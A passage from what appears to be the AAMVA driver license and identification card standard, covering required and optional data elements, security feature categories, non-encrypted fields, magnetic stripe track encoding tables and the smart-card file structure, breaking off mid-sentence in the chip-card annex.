Part 4: Inter-industry commands +ISO/IEC 7816-5: 1994, Identification cards - Integrated circuit(s) cards with contacts - Part 5: Numbering system and +registration procedure for application identifiers +ISO/IEC 7816-6: 1996, Identification cards - Integrated circuit(s) cards with contacts - Part 6: Inter-industry data +elements +ISO/IEC 10373: 1993, Identification cards - Test methods +Except for Clause 6.4 through 6.8, this standard has been superseded by: +ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 1: General characteristics tests +ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 2: Cards with mag stripes +ISO/IEC 10373-1: 1998, Identification Cards - Test Methods - Part 5: Optical memory cards +ISO/IEC 10536-1: 1992, Identification cards - Contactless integrated circuit(s) cards - Part 1: Physical characteristics +ISO/IEC 10536-2: 1995, Identification cards - Contactless integrated circuit(s) cards - Part 2: Dimensions and +locations of coupling areas +ISO/IEC 10536-3: 1996, Identification cards - Contactless integrated circuit(s) cards - Part 3: Electrical signals and +mode switching +ISO 10918-1: Information Technology - Digital compression and coding of continuous-tone-still images: Requirements +and Guidelines +ISO/IEC 11693: 1994, Identification cards - Optical memory cards - general characteristics +ISO/IEC 11694-1: 1994, Identification cards, Optical memory cards - Linear recording method Part 1: Physical +characteristics +ISO/IEC 11694-2: 1995, Identification cards, Optical memory cards - Linear recording method Part 2: Dimensions and +location of the accessible optical area +ISO/IEC 11694-3: 1995, Identification cards, Optical memory cards - Linear recording method Part 3: Optical +properties and characteristics +ISO/IEC 11694-4: 1996, Identification cards, Optical memory cards - Linear recording method Part 4: Logical data +structures +ISO/IEC 14443-1: Identification cards - Contactless integrated circuit cards - Proximity cards Part 1: Physical +characteristics +ISO/IEC 14443-2: Identification cards - Contactless integrated circuit cards - Proximity cards Part 2: Radio frequency +power and signal interface +ISO/IEC 14443-3: Identification cards - Contactless integrated circuit cards - Proximity cards Part 3: Initialization and +anticollision +2 + +ISO/IEC 14443-4: Identification cards - Contactless integrated circuit cards - Proximity cards Part 4: Transmission +protocols +ISO/IEC 15438: Automatic Identification and Data Capture Techniques - International Two-dimensional Symbology +Specification - PDF417 +ISO/IEC 15693-1: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 1: Physical +characteristics +ISO/IEC 15693-2: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 2: Air interface and +initialisation +ISO/IEC 15693-3: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 3: Protocols +ISO/IEC 15693-4: Identification cards - Contactless integrated circuit(s) cards - Vicinity cards - Part 4: Registration of +applications/issuers +MIL-L-61002 Labels, Pressure Sensitive Adhesive, for Bar-Codes and other Markings +4 Term(s) and definition(s) +For the purposes of this AAMVA National Standard, the following terms and definitions apply: +4.1 +driver license card +a card used to identify the card issuer and the card holder to facilitate Driver License transactions and to provide input +data for such transactions +4.2 +driver license card issuer +an organization that issues Driver License cards such as a Department of Motor Vehicles and the U.S. Department of +State +4.3 +driver license card holder +an individual to whom a Driver License card is issued +4.4 +numeric (N) +digits 0 to 9 +4.5 +special characters (S) +! “ # $ % & ‘ ( ) * + , - . / : ; < = > ? [ \ ] ^ _ @. A special character is removed from this category when it is used as a +delimiter. +4.6 +alphabetic (A) +alpha characters (UPPERCASE letters from A to Z) +4.7 +alphanumeric (ANS) +alpha characters (UPPERCASE letters from A to Z), numeric characters, space, and special characters +3 + +4.8 +front side of card +face of the card carrying visual information containing the card issuer and card holder identifiers +4.9 +back side of card +the opposite face from the front +4.10 +signature panel +area used for DL cardholder signature that is receptive to writing instruments +4.11 +DF +dedicated files +4.12 +EF +elementary files +4.13 +MF +master files +4.14 +CICCD +contactless integrated circuit card device +4.15 +CICC +contactless integrated circuit card +4.16 +ICC +integrated circuit card +4.17 +DL +driver license +4.18 +ID +identification card +4.19 +AKA +also known as +4.20 +IIN +issuer identification number +4.21 +digital +any data that is composed of a discrete sample or collection of discrete samples that are represented as finite +numbers +4 + +4.22 +image +digital data that represents the visual likeness of its subject, such as a portrait, finger, or signature. Images may be +collected, stored, and rendered for visual inspection using a variety for digital formats +5 Physical characteristics and card technologies +Various card technologies may be employed at the option of the card issuer subject to the restrictions described in 5.1 +and 5.2. None of these card technologies are required on the card, however, if they are used they shall be +implemented as defined in the appropriate annex. +5.1 Physical characteristics +Physical characteristics of cards that employ none of the optional card technologies are at the discretion of the card +issuer provided that, after any folding, there is a front side and a back side as defined herein. Additional physical +characteristics, if any, related to each card technology are specified in the annex for that card technology. +5.2 Card technologies +Available card technologies are shown in the following list. It is possible that certain types of card technologies may be +incompatible in combination. +Annex Technology Use of technology on card +A Magnetic stripe cards Optional +B Integrated circuit cards (ICC) Optional +C Finger imaging Optional +D Optical memory cards Optional +E Bar codes, 2 dimensional Optional +F Data compression for digital images Optional +5.3 Durability of card structure +Durability of the card is not established in this standard. Each jurisdiction shall select which test methods to use, if any, +and what minimum acceptable criteria to use, if any, based on a mutual agreement between the jurisdiction and their +card supplier. If card durability testing is required then one or more of the test methods listed in Annex G shall be +used. The jurisdiction shall communicate the mutually agreed to test method and criteria information to the card +supplier prior to any card procurement request. +6 Data elements +Human-readable information is information that is printed or embossed on the surface of a Driver License card. This +section also describes the information that can be electronically stored on the card. Annexes specify the mapping of +this information to specific technologies. Data element definitions, length, and type shall follow ANSI D20. +6.1 Description of table headings +6.1.1 Reference Number +A number for each data element used in this standard. +5 + +6.1.2 Data element/label +Data element is the clear name of the data element. When used as a human readable element the label is the +identifying “heading” before, after, over, or under the element as it appears on the DL/ID document. The label is shown +in bold under the data element name (i.e., “date of birth” would be “d.o.b.”). +6.1.3 Usage +The various uses for the data element. H = human readable, M = machine readable, B = both. +6.1.4 Definition +A statement of meaning and the attributes of the data element. In the case of a different definition or format between +the data element for the purposes of being (Human) or (Machine) readable, the distinction has been provided. +6.1.5 Field length and type +The valid field length for each data element. The following refer to the valid characters used (A=alpha A-Z, N=numeric, +S=special) in the related application. See ANSI D20. Magnetic Stripe data element length when different has been +noted. +6.1.6 Address requirement +The “mailing” related address fields were selected as the default to provide driver address information versus the +“residence” optional fields. The “residence” fields may be substituted for the “mailing” fields but shall adhere to the +length and type specified herein. +6 + +6.2 Required data elements +Table 1 — Required data elements +Ref. # Data Usage Definition Field length & type +element/label +1 Driver License B NAME of the individual holding Variable 35/AS +Name the Driver License or ID as +defined in ANSI D20 Data +Dictionary. +(Lastname@Firstname@MI@ +suffix if any) (Machine, Mag +Stripe uses ‘$’ and Bar Code +uses ‘,’ in place of ‘@’) +Firstname, Middle Initial, +Lastname (Human) +2 Driver Mailing B The place where the registered Variable 35/ANS +Street Address 1 driver of a vehicle (individual or Variable 29/ANS +corporation) may be contacted (Mag Stripe only) +such as a house number, street +address etc. +3 Driver Mailing City B NAME OF CITY for mailing Variable 20/ANS +address. Variable max +13/ANS +(Mag Stripe only) +4 Driver Mailing B JURISDICTION CODE for Fixed 2/AN +Jurisdiction Code mailing address. Conforms to +Canadian, Mexican and US +Jurisdictions as appropriate. +Codes for provinces (Canada) +and states (US and Mexico). +5 Driver Mailing B POSTAL CODE used for Fixed 11/ANS +Postal Code mailing. (As used by Canadian, +Mexican and US jurisdictions.) +6 Driver License/ID B NUMBER assigned or Variable 25/AN +Number calculated by the jurisdiction Variable max 13/N +DL# which identifies the Driver or ID (Mag Stripe only) +Holder. +7 ID/DL # * M Overflow for numbers longer Fixed 5/N +(Mag Stripe only) than 13 characters. (Mag Stripe only) +8 Driver License B A=Class A; B=Class B; Fixed 4/AN +Classification C=Class C (Class A, B and C Fixed 2/AN (Mag +Code are defined by Federal Highway Stripe only) +regulations); M=Class M +motorcycle as defined by +AAMVA; others are defined by +DL Classification Code +Standards. +9 Driver License B A restriction applicable to a Fixed 10/AN +Restriction Code driver license. +7 + +Ref. # Data Usage Definition Field length & type +element/label +10 Driver License B Any endorsements on a driver Fixed 5/AN +Endorsement license which authorize the +Code operation of specified types of +vehicles or the operation of +vehicles carrying specified +loads. Endorsements shall be +specific to classification of a +driver license. +11 Driver License B YYMM, CCYYMMDD Fixed 8/N +Expiration Date Year, Month, Day (Machine) Fixed 4/N +exp. Month, Day, Year (Human) (Mag Stripe only) +12 Date of Birth B CCYYMMDD (Machine) Fixed 8/N +d.o.b. Month, Day, Year (Human) +13 Driver Sex B DRIVER SEX as defined by the 1/N +sex ANSI D20 standard. (Machine) +M for Male, F for Female +(Human) +14 Driver License or B CCYYMMDD (Machine) 8/N +ID Document Month, Day, Year (Human) +Issue Date +iss. +15 ISO Issuer M This is the assigned Fixed 6/N +Identifier Number identification number from ISO. +(IIN) This number shall always begin +with a “6”. +16 Driver License or B Indicates that the document is a +Identification Card driver license or identification +Identifier card, whichever is applicable. +17 Color Photograph B The card holder’s photograph or +or Image image. +18 Signature B The card holder’s signature. +holder’s +signature +19 Security Features B To deter alteration and +counterfeiting. +6.3 Optional data elements +Table 2 — Optional data elements +Ref. # Data Usage Definition Field length & type +element/label +20 Height (FT/IN) B FEET (1); Inches (2). Ex. 509 = 3/N +hgt 5 ft., 9 in. +21 Weight (LBS) B WEIGHT in LBS. 3/N +wgt +22 Eye Color B EYE COLOR as defined by the 3/AN +eyes ANSI D20 standard. +23 Hair Color B HAIR COLOR as defined by the 3/AN +hair ANSI D20 standard. +8 + +Ref. # Data Usage Definition Field length & type +element/label +24 Social Security B The number assigned to an 9/N +Number individual by the Social Security +Administration. +25 Driver Permit B Identifies the type of permit as 2/A +Classification defined by ANSI D20. +Code +26 Driver Permit B CCYYMMDD; Date permit 8/N +Expiration Date expires (Machine) +Month, Day, Year (Human) +27 Permit Identifier B Type of permit. 25/AN +28 Driver Permit B CCYYMMDD; Date permit was 8/N +Issue Date issued. (Machine) +Month, Day, Year (Human) +29 Driver Permit B PERMIT RESTRICTIONS as 10/AN +Restriction Code defined by ANSI D20. +30 Driver Permit B PERMIT ENDORSEMENTS as 6/AN +Endorsement defined by ANSI D20. +Code +31 Driver Last Name B LAST NAME or SURNAME of 35/AN +(except Mag the individual holding the Driver +Stripe) License or ID. Hyphenated +names acceptable, but no other +use of special symbols. +32 Driver First Name B FIRST NAME or GIVEN NAME 35/AN +(except Mag of the individual holding the +Stripe) Driver License or ID. +Hyphenated names acceptable, +but no other use of special +symbols. +33 Driver Middle B MIDDLE NAME(s) or INITIALS 35/AN +Name or Initial (except Mag of the individual holding the +Stripe) Driver License or ID. +Hyphenated names acceptable, +spaces between names +acceptable, but no other use of +special symbols. +34 Driver Name B An affix occurring at the end of 3/AN +Suffix (except Mag a word, e.g.; Sr., Jr., II, III, IV, +Stripe) etc. +35 Driver Name B PREFIX to Driver Name. Not 5/AN +Prefix (except Mag defined in ANSI D20. Freeform +Stripe) as defined by issuing +jurisdiction. +36 Driver Mailing B STREET ADDRESS LINE 2. 35/AN +Street Address 2 (except Mag (MAILING) +Stripe) +37 Driver Residence B STREET ADDRESS LINE 1. 35/AN +Street Address 1 (except Mag (MAILING) +Stripe) +9 + +Ref. # Data Usage Definition Field length & type +element/label +38 Driver Residence B STREET ADDRESS LINE 2. 35/AN +Street Address 2 (except Mag (MAILING) +Stripe) +39 Driver Residence B NAME OF CITY for mailing 20/AN +City (except Mag address. +Stripe) +40 Driver Residence B JURISDICTION CODE for 2/AN +Jurisdiction Code (except Mag mailing address. Conforms to +Stripe) Canadian, Mexican and US +Jurisdictions as appropriate. +Codes for provinces (Canada) +and states (US and Mexico). +41 Driver Residence B POSTAL CODE of Residence 11/AN +Postal Code (except Mag +Stripe) +42 Height B HEIGHT in CENTIMETERS 3/N +(CM) (except Mag +Stripe) +43 Weight B WEIGHT in KILOGRAMS 3/N +(KG) (except Mag +Stripe) +44 Issue Timestamp M A string used by some 26/N +(except Mag jurisdictions to validate the +Stripe) document against their data +base. +45 Number of B Number of duplicate cards 2/N +Duplicates (except Mag issued for a license or ID if any. +Stripe) +46 Medical B STATE SPECIFIC. Freeform; 20/AN +Indicator/Codes (except Mag Standard "TBD" +Stripe) +47 Organ Donor B STATE SPECIFIC. Freeform; 10/AN +(except Mag Standard "TBD" +Stripe) +48 Non-Resident B "Y"; Used by some jurisdictions 1/A +Indicator (except Mag to indicate holder of the +Stripe) document is a non-resident. +49 Unique Customer B A number or alphanumeric 25/AN +Identifier (except Mag string used by some +Stripe) jurisdictions to identify a +"customer" across multiple data +bases. +50 Driver "AKA" Date B ALTERNATIVE DATES(S) 8/N +Of Birth (except Mag given as date of birth. +Stripe) +51 Driver "AKA" B FORMAT SAME AS DRIVER 9/N +Social Security (except Mag SOC SEC NUM. +Number Stripe) ALTERNATIVE NUMBERS(S) +used as SS NUM. +10 + +Ref. # Data Usage Definition Field length & type +element/label +52 Driver "AKA" B ALTERNATIVE NAME(S) of the 35/AN +Name (except Mag individual holding the Driver +Stripe) License or ID. FORMAT same +as defined in ANSI D20 Data +Dictionary. +(Lastname@Firstname@MI@ +suffix if any.) +53 Driver "AKA" Last B ALTERNATIVE LAST NAME or 35/AN +Name (except Mag SURNAME of the individual +Stripe) holding the Driver License or ID. +Hyphenated names acceptable, +but no other use of special +symbols. +54 Driver "AKA" First B ALTERNATIVE FIRST NAME 35/AN +Name (except Mag or GIVEN NAME of the +Stripe) individual holding the Driver +License or ID. Hyphenated +names acceptable, but no other +use of special symbols. +55 Driver "AKA" B ALTERNATIVE MIDDLE 35/AN +Middle Name (except Mag NAME(s) or INITIALS of the +Stripe) individual holding the Driver +License or ID. Hyphenated +names acceptable, spaces +between names acceptable, but +no other use of special symbols. +56 Driver "AKA" B ALTERNATIVE SUFFIX as 3/AN +Suffix (except Mag defined in ANSI D20. +Stripe) +57 Driver "AKA" B ALTERNATIVE PREFIX to 5/AN +Prefix (except Mag Driver Name. Not defined in +Stripe) ANSI D20. Freeform as defined +by issuing jurisdiction. +6.4 Format conventions +6.4.1 Character set +Unless otherwise specified, the information elements are alphanumeric as defined in clause 4. +6.4.2 Format of dates +Human-readable dates shall be shown as 6 characters, "mm/dd/yy", where mm = 2-digit month, dd = 2-digit day, and +yy = 2 last digits of year; or if the day is not required, as 4 characters, "mm/yy"; or if century is required, as 8 or 6 +characters, "mm/dd/ccyy" or "mm/ccyy", where cc = century. +11 + +7 Physical security +7.1 Definitions +The industry definitions of overt, covert, first line inspection, second line inspection, and third line inspection are as +follows and apply to this standard for the purposes of identifying and grouping the following security features. +7.1.1 Covert +Security features that are hidden in the document and are not intended to be made public. Used by Motor Vehicle +Administrators and law enforcement for document authentication and forensic purposes. (C=Covert) +7.1.2 Overt +A security feature that is visible or apparent without requiring special instruments. May require some instruction on +how to observe it. The feature may be particularly visible on the genuine document (a passive visible feature) or may +only show after a copy has been made. (O=Overt) +7.1.3 First line inspection +Cursory examination without tools or aids involves easily identifiable visual or tactile features for rapid inspection at +point of usage. (1=First Line Inspection) +7.1.4 Second line inspection +Examination by trained inspectors with simple equipment (magnifying glass, UV light, machine reading equipment, +etc.). (2=Second Line Inspection) +7.1.5 Third line inspection +Inspection by forensic specialists conducting detailed examination allows for more in-depth evaluation and may require +special equipment to provide true certification. (3=Third Line Inspection) +7.2 Physical security requirement +Jurisdictions issuing driver licenses and identification documents shall incorporate one or more overt security features +(e.g., optically variable devices) designed to limit tampering, counterfeiting, photocopying, or otherwise duplicating the +license or document for fraudulent purposes and to limit use of the license or document from impostors. Jurisdictions +should also include one or more covert security features (e.g., machine-readable technologies) to further safeguard +the license or document. Acceptable security features include, but are not limited to, the list found in Annex H of this +document. +8 Encryption +This standard will not address which data should be encrypted and how. Rather, there are certain elements that must +not be encrypted and conformance can be achieved only by leaving them accessible (not encrypted and readable) in +one of the technology formats specified herein. Under no circumstances may any Header as defined in Section E.4.2 +or the Subfile designators as defined in E.4.3 be encrypted. +Users at a minimum shall not encrypt the Data Elements outlined in Table 3: +12 + +Table 3 — Minimum Non-encrypted data elements +Ref. # Data Element +1 Driver License Name +6 Driver License/ID Number +11 Driver License Expiration Date +12 Date of Birth +15 ISO Issuer Identification Number (IIN) Example: 636000 (Virginia) +NOTE It is strongly recommended that all fields be left unencrypted in order to gain the maximum benefit from the use of a +Machine Readable technology. The Machine Readable information shall also be visible (human readable) on the DL/ID card as a +secondary verification method. The Machine Readable information shall not be encrypted unless privacy protection acts or +specific legislation mandates it by law. The Machine Readable information must give enough information on the license holder so +that it is usable by the various communities as a Machine Readable verification or audit methodology. +13 + +14 + +Annex A +(normative) +Mapping of driver license/identification card information to magnetic stripe +cards +Introduction +This annex defines mapping of the DL/ID card machine-readable data elements, as defined in clause 6, onto a +magnetic stripe card. +A.1 Conformance +Conformance with all parts of ISO/IEC 7811-6 is required with the exception of data content and coded character sets +as defined in Table A.1 and A.2. +A.2 Card characteristics +The physical characteristics and dimensions shall conform to ISO/IEC 7810. The magnetic stripe area shall conform to +ISO/IEC 7811-6 for tracks 1, 2, and 3. +A.3 Coded character set +Tables A.1 and A.2 define characters for tracks 1, 2, and 3. The coded character sets for 5 bit numeric and 7 bit +alphanumeric are the same as those described in ISO/IEC 7811-6. However, the use of the characters for data or +control purposes may be different. +Table A.1 — Coded character set for 5 bit numeric +ASCII Hex Binary ASCII Hex Binary +P 23 22 21 20 P 23 22 21 20 +0 30 1 0 0 0 0 8 38 0 1 0 0 0 +1 31 0 0 0 0 1 9 39 1 1 0 0 1 +2 32 0 0 0 1 0 : 3A 1 1 0 1 0 +3 33 1 0 0 1 1 ; 3B 0 1 0 1 1 +4 34 0 0 1 0 0 < 3C 1 1 1 0 0 +5 35 1 0 1 0 1 = 3D 0 1 1 0 1 +6 36 1 0 1 1 0 > 3E 0 1 1 1 0 +7 37 0 0 1 1 1 ? 3F 1 1 1 1 1 +The 3 characters : < > are available for hardware control purposes and shall not be used for +information (data content). +The 3 characters ; = ? shall have the following meaning: +; start sentinel += field separator +? end sentinel +15 + +Table A.2 — Coded character set for 7 bit alphanumeric +ASCII Hex Binary ASCII Hex Binary +P 25 24 23 22 21 20 P 25 24 23 22 21 20 +space 20 1 0 0 0 0 0 0 @ 40 0 1 0 0 0 0 0 +! 21 0 0 0 0 0 0 1 A 41 1 1 0 0 0 0 1 +“ 22 0 0 0 0 0 1 0 B 42 1 1 0 0 0 1 0 +# 23 1 0 0 0 0 1 1 C 43 0 1 0 0 0 1 1 +$ 24 0 0 0 0 1 0 0 D 44 1 1 0 0 1 0 0 +% 25 1 0 0 0 1 0 1 E 45 0 1 0 0 1 0 1 +& 26 1 0 0 0 1 1 0 F 46 0 1 0 0 1 1 0 +‘ 27 0 0 0 0 1 1 1 G 47 1 1 0 0 1 1 1 +( 28 0 0 0 1 0 0 0 H 48 1 1 0 1 0 0 0 +) 29 1 0 0 1 0 0 1 I 49 0 1 0 1 0 0 1 +* 2A 1 0 0 1 0 1 0 J 4A 0 1 0 1 0 1 0 ++ 2B 0 0 0 1 0 1 1 K 4B 1 1 0 1 0 1 1 +, 2C 1 0 0 1 1 0 0 L 4C 0 1 0 1 1 0 0 +- 2D 0 0 0 1 1 0 1 M 4D 1 1 0 1 1 0 1 +. 2E 0 0 0 1 1 1 0 N 4E 1 1 0 1 1 1 0 +/ 2F 1 0 0 1 1 1 1 O 4F 0 1 0 1 1 1 1 +0 30 0 0 1 0 0 0 0 P 50 1 1 1 0 0 0 0 +1 31 1 0 1 0 0 0 1 Q 51 0 1 1 0 0 0 1 +2 32 1 0 1 0 0 1 0 R 52 0 1 1 0 0 1 0 +3 33 0 0 1 0 0 1 1 S 53 1 1 1 0 0 1 1 +4 34 1 0 1 0 1 0 0 T 54 0 1 1 0 1 0 0 +5 35 0 0 1 0 1 0 1 U 55 1 1 1 0 1 0 1 +6 36 0 0 1 0 1 1 0 V 56 1 1 1 0 1 1 0 +7 37 1 0 1 0 1 1 1 W 57 0 1 1 0 1 1 1 +8 38 1 0 1 1 0 0 0 X 58 0 1 1 1 0 0 0 +9 39 0 0 1 1 0 0 1 Y 59 1 1 1 1 0 0 1 +: 3A 0 0 1 1 0 1 0 Z 5A 1 1 1 1 0 1 0 +; 3B 1 0 1 1 0 1 1 [ 5B 0 1 1 1 0 1 1 +< 3C 0 0 1 1 1 0 0 \ 5C 1 1 1 1 1 0 0 += 3D 1 0 1 1 1 0 1 ] 5D 0 1 1 1 1 0 1 +> 3E 1 0 1 1 1 1 0 ^ 5E 0 1 1 1 1 1 0 +? 3F 0 0 1 1 1 1 1 _ 5F 1 1 1 1 1 1 1 +The 14 characters ! “ & ‘ * + , : ; < = > @ _ are available for hardware control purposes and shall not +be used for information (data content). Applies to track 1 only. +The 3 characters [ \ ] are reserved for additional national characters when required. They shall not be +used internationally. Applies to track 1 only. +The character # is reserved for optional additional graphic symbols. Applies to track 1 only. +The 3 characters % ^ ? shall have the following meaning: +% start sentinel +^ field separator +? end sentinel +All 64 characters may be used for information (data content). Applies to track 3 only. +A. 4 Information content and format +This standard uses additional characters and a different format for track 3 than what is described in ISO/IEC 7811-6. +The following tables give the content for each track. This is unique to the AAMVA community and will require +modifications to the encoding and reading devices used in conjunction with track 3. The ability to implement such +16 + +modifications is a mainstay of the magnetic stripe environment and will introduce no significant problem to any +jurisdiction or to any public or private sector entity wishing to use the magnetic stripe DL/ID card. +A.4.1 Track 1 +Table A.3 — Track 1 information content and format +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +- 82 V-max O Track 1 A/N data in 7 bit binary code for see Table +state, city, name. A.2 and iv +1 1 F R Start This character must be encoded % +sentinel at the beginning of the track. +2 2 F R State or Mailing or residential code. A-Z, see ii +Province +3 13 V-max R City This field shall be truncated with A-Z +a field separator ^ if less than 13 +characters long. If the city is .-’ +exactly 13 characters long then +no field separator is used (see space +i). +Richfield^ +4 35 V-max R Name Priority is as follows, spaces A-Z +allowed; +last name$firstname$title .-’ +This field shall be truncated with +a field separator ^ if less than 35 space +characters long. The “$” symbol +is used as a delimiter between +names (see i & iii). +5 29 V R Address The street number shall be as it A-Z +would appear on mail. The $ is +used as a delimiter between 0-9 +address lines. This field shall be +truncated with a field separator .-’ +(or padded with spaces) if less +than 29 characters long but can space +be longer (see i). +28 Atol Av$Suite 2$^ +Hiawatha Park$Apt 2037^ +340 Brentwood Dr.$Fall Estate +6 1 F R End This character shall be after the ? +sentinel last data character of the track. +7 1 F R LRC Longitudinal redundancy check see Table +is generated from all other A.2 +characters and is the last +character encoded. +i Fields 3 and 4 may be shorter than the maximum listed. Total for fields 3,4 and 5 combined is +77 characters. +ii Allowable characters are further restricted to those defined in ANSI D-20. +iii The $ symbol is used for a delimiter rather than the @ symbol as defined in ANSI D-20. There +is no @ symbol in the 7 bit character set. +17 + +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +iv For Fields 1 through 6 only the following characters from Table A.2 are allowed: A-Z 0-9 $ % +( ) - . / ^ ? space +A.4.2 Track 2 +Table A.4 — Track 2 information content and format +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +- 40 V-max O Track 2 Numeric data in 5 bit binary see Table +code for DL number, expiration A.1 +date, birthdate. +1 1 F R Start This character shall be encoded ; +sentinel at the beginning of the track. +2 6 F R ISO IIN This is the assigned 0-9 +identification number from ISO. +This number shall always begin +with a “6”. +This number shall be obtained +from the AAMVAnet Standards +Program Director. +3 13 V-max R DL/ID# This field is used to represent 0-9 +the DL/ID number assigned by +each jurisdiction. +Overflow for DL/ID numbers +longer than 13 characters is +accommodated in field number +7. +4 1 F R Field A field separator must be used = +Separator after the DL/ID number +regardless of length. +18 + +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +5 4 F R Expiration This field is in the format: 0-9 +date YYMM +If MM=77 then license is “non- +expiring”. +If MM=88 the Expiration Date is +at the end of the month One +Year from the Month (MM) of +Field 6 and the Year (YY) of +Field 5 (Expiration Date). +If MM=99 then the Expiration +Date is on the Month (MM) and +Day (DD) of Field 6 (Birthdate) +and the Year (YY) of Field 5 +(Expiration Date). +6 8 F R Birthdate This field is in the format: 0-9 +CCYYMMDD +7 5 V O DL/ID# Overflow for numbers longer 0-9 +overflow than 13 characters. If no +information is used then a field +separator is used in this field. +8 1 F R End This character shall be after the ? +sentinel last data character of the track. +9 1 F R LRC Longitudinal redundancy check see Table +is generated from all other A.2 +characters and is the last +character encoded. +Rules governing DL/ID numbering format(s) will be kept by the Issuing DL/ID Agencies. DL/ID +Numbers containing printed Alpha characters will be represented by two numeric positions for each +Alpha character on Track 2. +Example: The character (A) = a numeric (01), character (B) = a numeric (02), character Z = a numeric +(26). +A.4.3 Track 3 +Table A.5 — Track 3 information content and format +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +- 82 V-max O Track 3 A/N data in 7 bit binary code see Table +for postal code, class, A.2 and ii +restrictions. +1 1 F R Start sentinel This character shall be % +encoded at the beginning of +the track. +2 1 F R Version # This field used to store the 02 +mag stripe version used. +3 1 F R Security v.# This field used to store the 0-9 +19 + +Field Length Length Req’d or Name Information Allowable +# in (char.) fixed or optional characters +order variable +security version being used +(00-63), 00 means no +security being used. +4 11 F R Postal code For an 11 digit postal or zip A-Z, 0-9, +code. (left justify fill with space +spaces, no hyphen) +5 2 F R Class Represents the type of DL A-Z, 0-9, +(ANSI codes modified for space +CDLIS).See i +6 10 F R Restrictions See i, iii A-Z, 0-9, +space +7 4 F R Endorsements See i, iii A-Z, 0-9, +space +8 1 F R Sex M for male, F for female. M,F +9 3 F R Height See i, iii 0-9, space +10 3 F R Weight See i, iii 0-9, space +11 3 F R Hair Color See i, iii A-Z, space +12 3 F R Eye Color See i, iii A-Z, space +13 10 V O ID # Discretionary data for use by see Table +each jurisdiction. A.2 +14 22 V O Reserved Discretionary data for use by see Table +space each jurisdiction. A.2 +15 5 V O Security Discretionary data for use by see Table +each jurisdiction. A.2 +16 1 F R End sentinel This character shall be after ? +the last data character of the +track. +17 1 F R LRC Longitudinal redundancy see Table +check is generated from all A.2 +other characters and is the +last character encoded. +i Allowable characters are further restricted to those defined in ANSI D-20. +ii All 64 characters may be used in data fields; this is different from the ISO use of Table A.2 +coded characters. Special hardware or software may be required for readers and encoders. +iii If not present pad with spaces. +A.5 Encoding specifications +Track locations, start of encoding location, end of encoding location, average bit density, flux transition spacing +variation, and signal amplitude requirements shall be as described in ISO/IEC 7811-6 for tracks 1, 2, and 3. +A.6 Error detection +Inclusion of parity and LRC as described in ISO/IEC 7811-6 is required. +20 + +Annex B +(normative) +Mapping of driver license/identification card information to integrated circuit(s) +cards (ICC) +Introduction +This annex defines the mapping of the driver license/identification card data elements onto an integrated circuit card +(ICC). The ICC may be either a contactless ICC or an ICC with contacts. +This annex defines: +- physical characteristics of an ICC, in addition to those characteristics specified in ISO/IEC 7810. +- location and dimensions of the contact or coupling areas, +- electrical signals to support communications between the ICC and the Interface Device (IFD); +- transmission protocols and answer to reset; +- command set; +- the file structure for the driver license/identification card application; and +- the data element mappings to the files. +All these requirements are aligned with the ISO/IEC standards for integrated circuit cards. There is one form of ICC +with contacts and there are three forms of contactless ICCs. All are defined the respective groups of standards: +ISO/IEC 7816 Identification cards - Integrated circuit(s) cards with contacts +ISO/IEC 10536 Identification cards - Contactless integrated circuit(s) cards - Closely coupled cards +ISO/IEC 14443 Identification cards - Contactless integrated circuit(s) cards - Proximity cards +ISO/IEC 15693 Identification cards - Contactless integrated circuit(s) cards - Vicinity cards +This annex defines the card structure and commands to be used when the ICC card is in operation (used by the +cardholder) but does not address the means used to manufacture or issue such a card. The issuance phases +(initialization, personalization, distribution) are beyond the scope of this standard. +Note The choice of technologies may affect interoperablity of the ICC, especially with POS systems that have +already been installed. The use the technologies defined in ISO/IEC 10536 and ISO/IEC 15693 may not be +appropriate for that environment. +21 + +B.2 Physical characteristics +The physical characteristics of the ICC shall adhere to the physical characteristics specified in the standard for the +respective type of card. +B.3 Location and dimensions of coupling areas +The location and dimension of the contact or coupling areas of the ICC shall adhere to the location and dimension +specified in the standard for the respective type of card. +B.4 Electronic signals +The electronic signals and reset procedures are given in the standard for the respective type of card. +B.5 Transmission protocols and answer to reset +B.5.1. Transmission protocols +The driver license/identification card may support a variety of protocols in accordance with the standard for the +respective type of card. Both the IFD and the ICC shall support at least the protocol T = 0 (see ISO/IEC 7816-3). +Other protocols that may be used are defined in the respective standards. +B.5.2. Answer to reset +The answer to reset shall adhere to the answer to reset specified in the standard for the respective type of card. A +contact ICC shall not specify a separate programming voltage. The use of historical bytes in the answer to reset is a +vendor option, but shall be in compliance with the respective standard. +B.6 Application selection +ICCs may support more than one application. The driver license application shall be the default application if none is +selected. There may be only one active driver license application in the ICC. +The driver license application shall be selected by use of the Application Identification (AID) as a reserved DF name. +The AID shall consist of the Registered Application Identifier (RID) assigned by ISO according to ISO/IEC 7816-5. +The AID shall not contain a Proprietary Application Identifier Extension (PIX). The RID is ‘A0 00 xx xx xx’. +B.7 File structure +Information on an ICC is stored in a file system defined in ISO/IEC 7816-4. The card file system is organized +hierarchically into dedicated files (DFs) and elementary files (EFs). Dedicated files (DFs) contain elementary files or +other dedicated files. A master file (MF) is the root of the file system. +One DF as defined by this specification contains driver license information about the cardholder. The DF has the name +‘A0 00 xx xx xx’ for the application (the registered AID) and is selected by this name. It can be placed anywhere in the +DF tree attached to the MF of the card, including the MF itself. +22 + +The EFs defined by this specification store the driver license/identification information elements in a record structure. +The records contain specific data elements as described in B.9. The Issuer file contains the control data elements for +the issuing authority. The License data file contains the data elements for the driver license. The Photo file contains +the digitized photo image if present. The issuer may use additional files for other information as desired. Additional +security controls may be placed these additional files as desired. +B.8 Command set +The commands to be supported by the driver license/identification card are as follows: +- SELECT FILE by DF name (full name) to select the application +- READ RECORD by short EF identifier with a specified record number +These commands, formats, and their return codes are defined in ISO/IEC 7816-4. When a READ RECORD command +is issued to the card on a file that does not exist (e.g., optional files) or that is not accessible (see clause B.10 on +security), the card will return an error code according to ISO/IEC 